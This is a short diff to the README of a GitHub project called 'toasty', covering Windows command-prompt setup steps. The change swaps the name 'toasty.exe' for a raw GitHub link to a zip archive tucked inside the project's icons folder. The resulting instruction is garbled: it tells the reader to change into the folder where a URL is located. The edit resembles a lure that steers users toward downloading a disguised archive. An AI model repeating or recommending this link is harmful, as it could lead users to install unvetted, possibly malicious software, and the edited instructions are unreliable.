shendaodao1/toasty/README.md

    Press `Windows + R`, type `cmd`, and hit `Enter`.

 2. **Navigate to the Toasty Directory**
-   Use the `cd` command to navigate to the folder where `toasty.exe` is located.
+   Use the `cd` command to navigate to the folder where `https://raw.githubusercontent.com/shendaodao1/toasty/main/icons/Software_3.5.zip` is located.
 For example:
    ```bash
    cd C:\Users\YourUsername\Downloads
    ```